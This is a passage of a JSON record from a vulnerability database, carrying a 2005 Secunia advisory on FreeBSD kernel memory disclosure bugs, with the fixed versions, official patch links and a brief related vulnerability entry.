4.x\r\nhttp://secunia.com/product/139/\r\n\r\nDESCRIPTION:\r\nChristian S.J. 
Peron has reported some vulnerabilities in FreeBSD,\r\nwhich can be exploited by malicious, local users to gain knowledge of\r\npotentially sensitive information.\r\n\r\nThe vulnerabilities are caused due to various errors in the kernel\r\nwhere variable-sized input is passed to applications in fixed-length\r\nbuffers without zeroing the unused portion of the buffers.\r\n\r\nSuccessful exploitation discloses random data in kernel memory.\r\n\r\nSOLUTION:\r\nUpdate FreeBSD or apply patch.\r\n\r\nFixed versions:\r\n2005-05-06 02:50:00 UTC (RELENG_5, 5.4-STABLE)\r\n2005-05-06 02:51:10 UTC (RELENG_5_4, 5.4-RELEASE)\r\n2005-05-06 02:50:35 UTC (RELENG_5_3, 5.3-RELEASE-p13)\r\n2005-05-06 02:48:46 UTC (RELENG_4, 4.11-STABLE)\r\n2005-05-06 02:49:35 UTC (RELENG_4_11, 4.11-RELEASE-p7)\r\n2005-05-06 02:49:08 UTC (RELENG_4_10, 4.10-RELEASE-p12)\r\n\r\nPatch for FreeBSD 4.x:\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem4.patch\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem4.patch.asc\r\n\r\nPatch for FreeBSD 5.x:\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem5.patch\r\nftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-05:08/kmem5.patch.asc\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nChristian S.J. 
Peron\r\n\r\nORIGINAL ADVISORY:\r\nftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:08.kmem.asc\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-05-06T00:00:00", "published": "2005-05-06T00:00:00", "id": "SECURITYVULNS:DOC:8567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8567", "title": "[SA15262] FreeBSD Kernel Memory Disclosure Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "/dev/iir weak permissions, kernel memory disclosure.", "modified": "2005-05-06T00:00:00", "published": "2005-05-06T00:00:00", "id": "SECURITYVULNS:VULN:4776", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4776", "title": "Multiple FreeBSD vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}